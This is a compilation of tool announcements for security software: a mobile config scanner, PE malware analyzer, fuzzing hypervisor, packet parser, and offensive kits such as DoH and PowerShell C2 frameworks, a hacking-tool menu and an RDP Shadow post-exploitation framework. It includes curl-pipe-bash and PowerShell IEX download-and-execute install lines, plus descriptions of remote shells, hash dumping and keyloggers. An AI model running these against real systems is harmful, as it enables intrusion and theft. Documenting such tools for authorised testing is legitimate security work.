
Truegaze - Static Analysis Tool For Android/iOS Apps Focusing On Security Issues Outside The Source Code


A static analysis tool for Android and iOS applications focusing on security issues outside the source code such as resource strings, third party libraries and configuration files.

Requirements
Python 3 is required, and all required modules are listed in the requirements.txt file. Only tested on Python 3.7, but it should work on other 3.x releases. There are no plans for 2.x support at this time.

Installation
You can install this via PIP as follows:
pip install truegaze
truegaze
To download and run manually, do the following:
git clone https://github.com/nightwatchcybersecurity/truegaze.git
cd truegaze
pip install -r requirements.txt
python -m truegaze.cli

How to use
To list modules:
truegaze list
To scan an application:
truegaze scan test.apk
truegaze scan test.ipa

Sample output
Listing modules:
user@localhost:~/$ truegaze list
Total active plugins: 1
+----------------+------------------------------------------+---------+------+
| Name           | Description                              | Android | iOS  |
+----------------+------------------------------------------+---------+------+
| AdobeMobileSdk | Detection of incorrect SSL configuration | True    | True |
|                | in the Adobe Mobile SDK                  |         |      |
+----------------+------------------------------------------+---------+------+
Scanning an application:
user@localhost:~/$ truegaze scan ~/test.ipa
Identified as an iOS application via a manifest located at: Payload/IPAPatch-DummyApp.app/Info.plist
Scanning using the "AdobeMobileSdk" plugin
-- Found 1 configuration file(s)
-- Scanning "Payload/IPAPatch-DummyApp.app/Base.lproj/ADBMobileConfig.json"
---- FOUND: The ["analytics"]["ssl"] setting is missing or false - SSL is not being used
---- FOUND: The ["remotes"]["analytics.poi"] URL doesn't use SSL: http://assets.example.com/c234243g4g4rg.json
---- FOUND: The ["remotes"]["messages"] URL doesn't use SSL: http://assets.example.com/b34343443egerg.json
---- FOUND: A "templateurl" in ["messages"]["payload"] doesn't use SSL: http://my.server.com/?user={user.name}&zip={user.zip}&c16={%sdkver%}&c27=cln,{a.PrevSessionLength}
---- FOUND: A "templateurl" in ["messages"]["payload"] doesn't use SSL: http://my.43434server.com/?user={user.name}&zip={user.zip}&c16={%sdkver%}&c27=cl n,{a.PrevSessionLength}
Done!
Display installed version:
user@localhost:~/$ truegaze version
Current version: v0.2

Structure
The application is command line and consists of several modules that check for various vulnerabilities. Each module does its own scanning, and all results are printed to the command line.
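As a rough illustration of that structure, here is a hypothetical sketch of what such a module might look like. The class layout and method names are illustrative only and do not reflect truegaze's actual plugin API:

# Hypothetical module sketch -- names and interface are illustrative,
# not truegaze's real plugin API.
class SampleModule:
    name = 'SampleModule'
    description = 'Example check for cleartext http:// URLs in config files'

    def scan(self, files):
        """Scan a mapping of {path: bytes} extracted from the APK/IPA."""
        results = []
        for path, contents in files.items():
            if b'http://' in contents:
                results.append('%s: URL does not use SSL' % path)
        return results  # each module reports its own findings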

Reporting bugs and feature requests
Please use the GitHub issue tracker to report issues or suggest features: https://github.com/nightwatchcybersecurity/truegaze
You can also send email to research /at/ nightwatchcybersecurity [dot] com

Wishlist
  • More unit test coverage for code that interacts with Click
  • Ability to extract additional files from online source
  • Ability to check if a particular vulnerability is exploitable
  • Ability to produce JSON or XML output that can feed into other tools
  • More modules!

About the name
"True Gaze" or "Истинное Зрение" is a magical spell that reveals the invisible (from the book "Last Watch" by Sergei Lukyanenko)



goDoH - A DNS-over-HTTPS C2


godoh is a proof-of-concept Command and Control framework, written in Golang, that uses DNS-over-HTTPS as a transport medium. Currently supported providers are Google and Cloudflare, and traditional DNS can also be used.

Installation
All you would need are the godoh binaries themselves. Binaries are available for download from the releases page as part of tagged releases.
To build godoh from source, follow these steps:
  • Ensure you have dep installed (go get -v -u github.com/golang/dep/cmd/dep)
  • Clone this repository to your $GOPATH's src/ directory so that it is in sensepost/godoh
  • Run dep ensure to resolve dependencies
  • Run make key to generate a unique encryption key to use for communication
  • Use the go build tools, or run make to build the binaries in the build/ directory

Usage
$ godoh -h
A DNS (over-HTTPS) C2
    Version: dev
    By @leonjza from @sensepost

Usage:
  godoh [command]

Available Commands:
  agent       Connect as an Agent to the DoH C2
  c2          Starts the godoh C2 server
  help        Help about any command
  receive     Receive a file via DoH
  send        Send a file via DoH
  test        Test DNS communications

Flags:
  -d, --domain string     DNS Domain to use. (ie: example.com)
  -h, --help              help for godoh
  -p, --provider string   Preferred DNS provider to use. [possible: google, cloudflare, raw] (default "google")

Use "godoh [command] --help" for more information about a command.
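To make the transport concrete, the following is a minimal DNS-over-HTTPS TXT lookup in Python against Google's public JSON DoH API. This only illustrates the mechanism a DoH C2 rides on; it is not godoh code (godoh itself is written in Golang):

# Minimal DoH illustration: a TXT lookup via Google's public JSON DoH API.
import requests

resp = requests.get('https://dns.google/resolve',
                    params={'name': 'example.com', 'type': 'TXT'})
for answer in resp.json().get('Answer', []):
    print(answer['data'])  # a DoH C2 encodes its payloads in records like these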


PEpper - An Open Source Script To Perform Malware Static Analysis On Portable Executable


An open source tool to perform malware static analysis on Portable Executables.

Installation
eva@paradise:~$ git clone https://github.com/Th3Hurrican3/PEpper/
eva@paradise:~$ cd PEpper
eva@paradise:~$ pip3 install -r requirements.txt
eva@paradise:~$ python3 pepper.py ./malware_dir


Screenshot





CSV output


Features extracted
  • Suspicious entropy ratio (see the entropy sketch after this list)
  • Suspicious name ratio
  • Suspicious code size
  • Suspicious debugging time-stamp
  • Number of exports
  • Number of anti-debugging calls
  • Number of virtual-machine detection calls
  • Number of suspicious API calls
  • Number of suspicious strings
  • Number of YARA rules matches
  • Number of URLs found
  • Number of IPs found
  • Cookie on the stack (GS) support
  • Control Flow Guard (CFG) support
  • Data Execution Prevention (DEP) support
  • Address Space Layout Randomization (ASLR) support
  • Structured Exception Handling (SEH) support
  • Thread Local Storage (TLS) support
  • Presence of manifest
  • Presence of version
  • Presence of digital certificate
  • Packer detection
  • VirusTotal database detection
  • Import hash
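As a taste of how one of these features can be computed, here is a minimal sketch of a section-entropy check using the pefile package. This is not PEpper's actual code, and the 7.0 threshold is an illustrative assumption:

# Sketch of an entropy check (high-entropy sections often hint at packing).
# Assumes the pefile package; the threshold is illustrative, not PEpper's.
import pefile

pe = pefile.PE('sample.exe')  # path is a placeholder
for section in pe.sections:
    entropy = section.get_entropy()  # Shannon entropy, 0..8 bits per byte
    name = section.Name.rstrip(b'\x00').decode(errors='replace')
    flag = 'SUSPICIOUS' if entropy > 7.0 else 'ok'
    print('%-10s %.2f %s' % (name, entropy, flag))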

Notes
  • Can be run on a single PE or multiple PEs (placed inside a directory)
  • Output will be saved (in the same directory as pepper.py) as output.csv
  • To use the VirusTotal scan, add your private key to the module called "virustotal.py" (Internet connection required)

Credits
Many thanks to those who indirectly helped me in this work, especially:


Applepie - A Hypervisor For Fuzzing Built With WHVP And Bochs


Hello! Welcome to applepie! This is a tool designed for fuzzing, introspection, and finding bugs! This is a hypervisor using the Windows Hypervisor Platform API present in recent versions of Windows (specifically this was developed and tested on Windows 10 17763). Bochs is used for providing deep introspection and device emulation.
The Windows Hypervisor Platform API (WHVP) is an API set for accessing Hyper-V's hypervisor abilities. This API makes it easy for us to implement a virtual machine all in user-space without any special drivers or permissions needed.

Recent Feature Demo


Binary Coverage Example


What is this for?
This is a tool designed for fuzzing and introspection during security research. By using a hypervisor, common fuzzing techniques can be applied to any target, kernel or userland. This environment allows fuzzing of whole systems without needing the target's source. At the hypervisor level code coverage can be gathered, and if needed Bochs emulation can be used to provide arbitrary introspection in an emulation environment. This coverage information can be used to figure out the effectiveness of the fuzz cases. A fuzz case that increases coverage can be saved as an interesting case; such inputs can be reused later and built on with new corruptions.
Snapshot fuzzing is the primary use of this tool: you take a snapshot of a system in a certain state and save it off. This snapshot can then be loaded up for fuzzing, a fuzz case is injected, and execution is resumed. Since the VM can be reset very cheaply, it can be reset often. If it takes Word 5 seconds to boot, but you can snapshot it right as it reads your file, you can cut the fuzz case down to only what is relevant to an input. This allows for a very tight fuzzing loop without needing access to source. Since the VMs are entirely separate systems, many can be run in parallel to allow scaling to all cores.
Currently this tool only supports gathering code coverage, dynamic symbol downloading for Windows, and symbol/module parsing for Windows targets as well. Fuzzing support will be added quite soon.

Development cycle
Given that I've written almost all of the features here before (coverage, fuzzing, fast resets, etc.), I expect this project should pretty quickly become ready for fuzzing, unless I get distracted :D
I'm aiming for end-of-January for coverage (done!), feedback, module listings (done!), process lists, fast resets, and symbol support (done!), which would make it a very capable fuzzer.

OS Support
The main supported target is modern Windows 10. Windows targets support downloading of symbols from the symbol store. This allows for symbolic coverage on Windows targets out of the box. However, the code is written in a way that Linux enlightenment can easily be added.
Without any enlightenment, any OS that boots can still be fuzzed and basic coverage can be gathered.
Before reporting OS support issues please validate that the issue is in the hypervisor/changes to Bochs by trying to boot your target using standard prebuilt Bochs with no hypervisor. Bochs is not commonly used and can frequently have breaking bugs for even common things like booting Linux, especially with the rapid internal changes to CPUID/MSR usage as Spectre/Meltdown mitigations go into OSes.

Issues
See the issues page on Github for a list of issues. I've seeded it with a few already. Some of these need to be addressed quickly before fuzzing development starts.

Building

Build Prereqs
To build this you need a few things:
  • Recently updated MSVC compiler (Visual Studio 2017)
  • Nightly Rust (https://rustup.rs/ , must be nightly)
  • Python (I used 3 but 2 should work too)
  • 64-bit cygwin with autoconf and GNU make packages installed
  • Hyper-V installed and a recent build of Windows 10

MSVC
Install Visual Studio 2017 and make sure it's updated. We're using some bleeding edge APIs, headers, and libraries here.
I was using cl.exe version: Microsoft (R) C/C++ Optimizing Compiler Version 19.16.27025.1 for x64 And SDK version 10.0.17763.0

Nightly Rust
Install Rust via https://rustup.rs/. I used rustc 1.32.0-nightly (b3af09205 2018-12-04)
Make sure you install the x86_64-pc-windows-msvc toolchain as only 64-bit is supported for this project.
Make sure cargo is in your path. This should be the default.

Python
Go grab python https://www.python.org/ and make sure it's in your PATH such that python can be invoked.

Cygwin
Install 64-bit Cygwin (https://www.cygwin.com/setup-x86_64.exe) specifically to C:\cygwin64. When installing Cygwin make sure you install the autoconf and make packages.

Hyper-V
Go into "Turn Windows features on or off" and tick the checkbox next to "Hyper-V" and "Windows Hypervisor Platform". This requires of course that your computer supports Hyper-V.

Step-by-step build process
This install process guide was verified on the following:
Clean install of Windows 10, Build 17763
rustc 1.33.0-nightly (8e2063d02 2019-01-07)
Microsoft (R) C/C++ Optimizing Compiler Version 19.16.27025.1 for x64
Visual Studio Community 2017 version 15.9.4
applepie commit `f84c084feb487e2e7f31f9052a4ab0addd2c4cf9`
Python 3.7.2 x64
git version 2.20.1.windows.1
  • Make sure Windows 10 is fully up to date
    • We use some bleeding edge features with WHVP and only latest Windows 10 is tested
  • In "Turn Windows features on or off"
    • Tick "Hyper-V"
    • Tick "Windows Hypervisor Platform"
    • Click ok to install and reboot

  • Install VS Community 2017 and update it
    • Desktop development with C++

  • Install Rust nightly for x86_64-pc-windows-msvc


  • Install Git
    • Configure git to checkout as-is, commit unix-style
    • If git converts on checkout the ./configure script will fail for Bochs due to CRLF line endings
    • This is core.autocrlf=input
    • You can also use checkout as-is, commit as-is
    • This is core.autocrlf=false
  • Install Cygwin x64 via setup-x86_64.exe
    • Install to "C:\cygwin64"
    • Install autoconf package (autoconf package)
    • Install GNU make (make package)
  • Install Python
    • I installed Python 3 x64 and added to PATH
    • Python 2 and 32-bit versions should be fine, we just use Python for our build script
  • Open a "x64 Native Tools Command Prompt for VS 2017"
  • Checkout applepie via git clone https://github.com/gamozolabs/applepie
  • cd into applepie
  • Run python build.py
    • This will first check for some basic system requirements
    • It will build the Rust bochservisor DLL
    • It will then configure Bochs via autoconf
    • It will then build Bochs with GNU make from Cygwin
This initial build process may take about 2 minutes, though on a modern machine it's more likely 20-30 seconds.

Actually Building
Just run python build.py from the root directory of this project. It should check for sanity of the environment and everything should "just work".

Cleaning
Run python build.py clean to clean Bochs and Rust binaries.
Run python build.py deepclean to completely remove all Bochs and Rust binaries, it also removes all the configuration for Bochs. Use this if you reconfigure Bochs in some way.

Usage
Read up on Bochs configuration to figure out how to set up your environment. We have a few requirements, like sync=none, ips=1000000, and currently single processor support only. These are enforced inside of the code itself to make sure you don't shoot yourself in the foot.
Use the included bochservisor_test\bochsrc.bxrc and bochservisor_test_real\bochsrc.bxrc configurations as examples. bochservisor_test_real is likely the most up to date config you should look at as reference.

Coverage
Windows targets have module list enlightenment, which allows us to see the listings for all the modules in the context we are running in. With this we can convert the instruction addresses to module + offset. This module + offset helps keep coverage information between fuzz cases where ASLR state changes. It also allows for the module to be colored in a tool like IDA to visually see what code has been hit.
For Windows targets, symbols will be dynamically downloaded from the symbol store using your _NT_SYMBOL_PATH and using symchk. Without symchk in the path it will silently fail. With symbols a nice human-readable version of coverage can be saved for viewing. Further, with private symbols the coverage can be converted to source:line such that source code can be colored.
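The module+offset conversion described above is easy to picture in a few lines. The sketch below is a generic Python illustration (not applepie's Rust code) with made-up module bases:

# Generic illustration of converting absolute instruction addresses into
# module + offset form, which stays stable across ASLR between fuzz cases.
modules = [
    # (base address, size, name) -- illustrative values only
    (0x7ff650000000, 0x1000000, 'ntoskrnl.exe'),
    (0x7ff700000000, 0x200000, 'target.dll'),
]

def module_offset(addr):
    for base, size, name in modules:
        if base <= addr < base + size:
            return (name, addr - base)
    return (None, addr)  # address outside any known module

print(module_offset(0x7ff700001234))  # ('target.dll', 0x1234)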

Tests
Okay there aren't really tests, but there's bochservisor_test which is a tiny OS that just verifies that everything boots with the hypervisor.
There's then bochservisor_test_real which is a configuration I use for things like Windows/Linux. This is the one that will probably get updated most frequently.

Architecture

Basics
This codebase introduces a small amount of code to Bochs to allow modular access to CPU context, mapping of guest physical addresses to their backing memory, and stepping of both device and CPU state.
The main code you want to look at is in lib.rs in the bochservisor Rust project.

CPU Loop
In the main CPU loop of Bochs we instead call LoadLibrary() to load the bochservisor DLL. This DLL exports one routine, the Rust CPU loop, which is then invoked.
Bochs will pass a structure to this bochs_cpu_loop routine which will contain function pointers to get information from Bochs and to step the device and CPU state in it.

MMIO / I/O
When MMIO or I/O occurs, the hypervisor will exit with a memory fault or an I/O instruction fault. While WHVP does provide an emulation API, it's really lacking and not sufficient.
Instead we use Bochs, which is already there, and step through a few instructions. By keeping the hypervisor CPU state in sync with Bochs we can dynamically switch between hypervisor and emulation at any time (or at least we should be able to).
This means that the full hypervisor state is always in sync with Bochs, and thus things like Bochs snapshots should work as normal and could be booted without the hypervisor (except maybe some CPUID state which needs to be stored in the snapshot info).
When MMIO or I/O occurs we run a certain number of instructions under emulation rather than emulating just one. Due to the API costs of entering and exiting the hypervisor, and the likelihood that similar MMIO operations occur next to each other, we step a few instructions. This allows us to reduce the overhead of the API and reduces the VMEXIT frequency. This is a tunable number, but what is in the codebase is likely there for a reason.

Interrupts
We handle interrupts in a really interesting way. Rather than scheduling interrupts to be delivered to the hypervisor, we handle all interrupts in Bochs emulation itself. Exceptions that happen entirely inside of the hypervisor are of course not handled by Bochs.
This also gives us features that WHVP doesn't support, like SMIs (for SMM). Bochs's BIOS uses SMM by default and without SMI support a custom BIOS needs to be built. I did this in my first iteration of this... do not recommend.

Future
This project is designed for fuzzing, however it's so new (only a few days old) that it has none of these features.
Some of the first things to come will be:

Evaluate threading
We could potentially have Bochs device stuff running in one thread in a loop in real-time, and another thread running the hypervisor. Async events would be communicated via IPC and would allow for the devices to be updated while execution is in the guest.
Currently everything happens in one thread which means the hypervisor must exit on an interval to make sure we can step devices. It's as if we wrote our own scheduler.
This might be a bit faster, but it also increases complexity and adds the potential for race issues. It's hard to say if this will ever happen.

Code coverage
I'm not sure which method I'll use to gather code coverage, but there will be at least a few options, ranging from accurate to fast. All these coverage mechanisms will be system level and will not require source or symbols of targets.

Guest enlightenment
Parsing of OS structures to get primitive information such as process listings, module lists, etc. This would then be used to query PDBs to get symbol information.

Crash reporting
Reporting crashes in some meaningful way. Ideally minidumps would be nice as they could be loaded up and processed in WinDbg. This might be fairly easy as DMPs are just physical memory and processor context, which we already have.

Crash deduping / root causing
I've got some fun techniques for root causing bugs which have been historically successful. I plan to bring those here.

Fast resets
By tracking dirty pages and restoring only modified memory we should be able to reset VMs very quickly. This gives us the ability to fuzz at maximum speed on all cores of a target system. This is similar to what I did in falkervisor, so it's already thought out and designed. It just needs to be ported here.

falkervisor mode
Extremely fast fuzzing that cancels execution when MMIO or I/O occurs. This allows all the CPU time to be spent in the hypervisor and no emulation time. This has a downside of not supporting things like disk I/O during a fuzz case, but it's nice.

Philosophy
One of the core concepts of this project is making the absolute minimum of modifications to Bochs. This allows us to keep the Bochs portion of this repo up to date.
The goal is to also move as much code into Rust and dlls as possible to make the system much more modular and safe. This will hopefully reduce the chances of making silly corruption bugs in the hypervisor itself, causing invalid fuzz results.
Currently the hypervisor is a DLL and can be swapped out without changes to Bochs (unless the FFI API changes).
Further changes to Bochs itself must be documented clearly, and I'll be making a document for that shortly to track the changes to Bochs which must be ported and re-evaluated with Bochs updates.


Pyshark - Python Wrapper For Tshark, Allowing Python Packet Parsing Using Wireshark Dissectors


Python wrapper for tshark, allowing python packet parsing using wireshark dissectors.
Extended documentation: http://kiminewt.github.io/pyshark
Python2 deprecation - This package no longer supports Python2; if you still need Python2 support, use an older release.
Looking for contributors - for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull requests will be reviewed, and if anyone is interested and suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.
There are quite a few python packet parsing modules; this one is different because it doesn't actually parse any packets, it simply uses the ability of tshark (the wireshark command-line utility) to export XML and uses that for its parsing.
This package allows parsing from a capture file or a live capture, using all wireshark dissectors you have installed. Tested on Windows and Linux.

Installation

All Platforms
Simply run the following to install the latest from pypi
pip install pyshark
Or install from the git repository:
git clone https://github.com/KimiNewt/pyshark.git
cd pyshark/src
python setup.py install

Mac OS X
You may have to install libxml, which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:
xcode-select --install
pip install libxml
You will probably have to accept a EULA for XCode so be ready to click an "Accept" dialog in the GUI.

Usage

Reading from a capture file:
>>> import pyshark
>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')
>>> cap
<FileCapture /tmp/mycapture.cap (589 packets)>
>>> print(cap[0])
Packet (Length: 698)
Layer ETH:
Destination: BLANKED
Source: BLANKED
Type: IP (0x0800)
Layer IP:
Version: 4
Header Length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
Total Length: 684
Identification: 0x254f (9551)
Flags: 0x00
Fragment offset: 0
Time to live: 1
Protocol: UDP (17)
Header checksum: 0xe148 [correct]
Source: BLANKED
Destination: BLANKED
...

Other options
  • param keep_packets: Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.
  • param input_file: Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.
  • param display_filter: A display (wireshark) filter to apply on the cap before reading it.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PSK'; defaults to WPA-PWD).
  • param tshark_path: Path of the tshark binary
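For instance, a few of these options can be combined when opening a capture; a short sketch (the capture path is a placeholder):

# Open a capture with a display filter, conserving memory on large files.
import pyshark

cap = pyshark.FileCapture('/tmp/mycapture.cap',
                          display_filter='http',
                          keep_packets=False)  # discard packets after reading
for pkt in cap:
    print(pkt.highest_layer)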

Reading from a live interface:
>>> capture = pyshark.LiveCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

>>> for packet in capture.sniff_continuously(packet_count=5):
...     print('Just arrived:', packet)

Other options
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PSK'; defaults to WPA-PWD).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.
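A sketch combining a few of these options (the interface name and output path are placeholders):

# Sniff DNS traffic for 30 seconds and also save it to a pcap file.
import pyshark

capture = pyshark.LiveCapture(interface='eth0',
                              bpf_filter='udp port 53',
                              output_file='/tmp/dns.pcap')
capture.sniff(timeout=30)
print(capture)  # e.g. <LiveCapture (N packets)>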

Reading from a live interface using a ring buffer
>>> capture = pyshark.LiveRingCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

>>> for packet in capture.sniff_continuously(packet_count=5):
...     print('Just arrived:', packet)

Other options
  • param ring_file_size: Size of the ring file in kB, default is 1024
  • param num_ring_files: Number of ring files to keep, default is 1
  • param ring_file_name: Name of the ring file, default is /tmp/pyshark.pcap
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PSK'; defaults to WPA-PWD).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live remote interface:
>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')
>>> capture.sniff(timeout=50)
>>> capture

Other options
  • param remote_host: The remote host to capture on (IP or hostname). Should be running rpcapd.
  • param remote_interface: The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).
  • param remote_port: The remote port the rpcapd service is listening on
  • param bpf_filter: A BPF (tcpdump) filter to apply on the cap before reading.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PSK'; defaults to WPA-PWD).
  • param tshark_path: Path of the tshark binary

Accessing packet data:
Data can be accessed in multiple ways. Packets are divided into layers; first you have to reach the appropriate layer and then you can select your field.
All of the following work:
>>> packet['ip'].dst
192.168.0.1
>>> packet.ip.src
192.168.0.100
>>> packet[2].src
192.168.0.100
To test whether a layer is in a packet, you can use its name:
>>> 'IP' in packet
True
To see all possible field names, use the packet.layer.field_names attribute (e.g. packet.ip.field_names) or the autocomplete function of your interpreter.
You can also get the original binary data of a field, or a pretty description of it:
>>> p.ip.addr.showname
Source or Destination Address: 10.0.0.10 (10.0.0.10)
# And some new attributes as well:
>>> p.ip.addr.int_value
167772170
>>> p.ip.addr.binary_value
'\n\x00\x00\n'

Decrypting packet captures
Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).
>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')
>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')
A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.
>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')
>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')


Hacktronian - All In One Hacking Tool For Linux & Android


***Pentesting tools that every hacker needs.***

HACKTRONIAN Menu :
  • Information Gathering
  • Password Attacks
  • Wireless Testing
  • Exploitation Tools
  • Sniffing & Spoofing
  • Web Hacking
  • Private Web Hacking
  • Post Exploitation
  • Install The HACKTRONIAN

Information Gathering:
  • Nmap
  • Setoolkit
  • Port Scanning
  • Host To IP
  • wordpress user
  • CMS scanner
  • XSStrike
  • Dork - Google Dorks Passive Vulnerability Auditor
  • Scan A server's Users
  • Crips

Password Attacks:
  • Cupp
  • Ncrack

Wireless Testing:
  • reaver
  • pixiewps
  • Fluxion

Exploitation Tools:
  • ATSCAN
  • sqlmap
  • Shellnoob
  • commix
  • FTP Auto Bypass
  • jboss-autopwn

Sniffing & Spoofing:
  • Setoolkit
  • SSLtrip
  • pyPISHER
  • SMTP Mailer

Web Hacking:
  • Drupal Hacking
  • Inurlbr
  • Wordpress & Joomla Scanner
  • Gravity Form Scanner
  • File Upload Checker
  • Wordpress Exploit Scanner
  • Wordpress Plugins Scanner
  • Shell and Directory Finder
  • Joomla! 1.5 - 3.4.5 remote code execution
  • Vbulletin 5.X remote code execution
  • BruteX - Automatically brute force all services running on a target
  • Arachni - Web Application Security Scanner Framework

Private Web Hacking:
  • Get all websites
  • Get joomla websites
  • Get wordpress websites
  • Control Panel Finder
  • Zip Files Finder
  • Upload File Finder
  • Get server users
  • SQli Scanner
  • Ports Scan (range of ports)
  • ports Scan (common ports)
  • Get server Info
  • Bypass Cloudflare

Post Exploitation:
  • Shell Checker
  • POET
  • Weeman

Installation in Linux:
This Tool Must Run As ROOT !!!
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x install.sh
./install.sh
That's it. You can execute the tool by typing hacktronian

Installation in Android:
Open Termux
pkg install git
pkg install python
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x hacktronian.py
python2 hacktronian.py

Video Tutorial:



PoshC2 - C2 Server and Implants


PoshC2 is a proxy aware C2 framework that utilises Powershell and/or equivalent (System.Management.Automation.dll) to aid penetration testers with red teaming, post-exploitation and lateral movement. Powershell was chosen as the base implant language as it provides all of the functionality and rich features without needing to introduce multiple third party libraries to the framework.
In addition to the Powershell implant, PoshC2 also has a basic dropper written purely in Python that can be used for command and control over Unix based systems such as Mac OS or Ubuntu.
The server-side component is written in Python for cross-platform portability and speed. A Powershell server component still exists and can be installed using the 'Windows Install' shown below, but it will not be maintained with future updates and releases.

Linux Install Python3
Automatic install for Python3 using curl & bash
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh | bash
Manual install Python3
wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh
chmod +x ./Install.sh
./Install.sh

Linux Install Python2 - stable but unmaintained
Automatic install for Python2 using curl & bash
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh | bash
Manual install Python2
wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh
chmod +x ./Install.sh
./Install.sh

Windows Install
Install Git and Python (and ensure Python is in the PATH), then run:
powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.ps1')"

Using older versions
You can use an older version of PoshC2 by referencing the appropriate tag. You can list the tags for the repository by issuing:
git tag --list
or viewing them online.
Then you can use the install one-liner but replace the branch name with the tag:
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/<tag name>/Install.sh | bash
For example:
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/v4.8/Install.sh | bash

Offline
If you have a local clone of PoshC2 you can change the version that is in use by just checking out the version you want to use:
git reset --hard <tag name>
For example:
git reset --hard v4.8
However, note that this will overwrite any local changes to files, such as Config.py, and you may have to re-run the install script for that version or re-set up the environment appropriately.

Running PoshC2
  1. Edit the config file by running posh-config to open it in $EDITOR. If this variable is not set then it defaults to vim, or you can use --nano to open it in nano.
  2. Run the server using posh-server or python3 -u C2Server.py | tee -a /var/log/poshc2_server.log
  3. Others can view the log using posh-log or tail -n 5000 -f /var/log/poshc2_server.log
  4. Interact with the implants using the handler, run by using posh or python3 ImplantHandler.py

Installing as a service
Installing as a service provides multiple benefits such as being able to log to service logs, viewing with journalctl and automatically starting on reboot.
  1. Add the file in systemd (this is automatically done via the install script)
cp poshc2.service /lib/systemd/system/poshc2.service
  2. Start the service
posh-service
  3. View the log:
posh-log
  4. Or alternatively use journalctl (but note this can be rate limited)
journalctl -n 20000 -u poshc2.service -f --output cat
Note that re-running posh-service will restart the service. Running posh-service will automatically start displaying the log; Ctrl-C will not stop the service, only quit the log, in which case posh-log can be used to re-view the log at any point. posh-stop-service can be used to stop the service.

Issues / FAQs
If you are experiencing any issues during the installation or use of PoshC2 please check the known issues below and the open issues tracking page within GitHub. If this page doesn't have what you're looking for please open a new issue and we will try to resolve the issue asap.
If you are looking for tips and tricks on PoshC2 usage and optimisation, you are welcome to join the slack channel below.

License / Terms of Use
This software should only be used for authorised testing activity and not for malicious use.
By downloading this software you are accepting the terms of use and the licensing agreement.

Documentation
We maintain PoshC2 documentation over at https://poshc2.readthedocs.io/en/latest/
Find us on #Slack - poshc2.slack.com (to request an invite send an email to labs@nettitude.com)

Known issues

Error encrypting value: object type
If you get this error after installing PoshC2 it is due to dependency clashes in the pip packages on the system.
Try creating a Python virtualenv and re-installing the requirements so that the exact versions specified are in use for PoshC2. Make sure you deactivate when you've finished in this virtualenv.
For example:
pip install virtualenv
virtualenv /opt/PoshC2_Python/
source /opt/PoshC2_Python/bin/activate
pip install -r requirements.txt
python C2Server.py
Note that any time you run PoshC2 you have to reactivate the virtual environment and run it within it.
The use of a virtual environment is abstracted if you use the posh- scripts on *nix.


AutoRDPwn v5.0 - The Shadow Attack Framework


AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on-demand, using tools native to the operating system itself.
Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this through a completely intuitive menu in seven different languages.
Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements
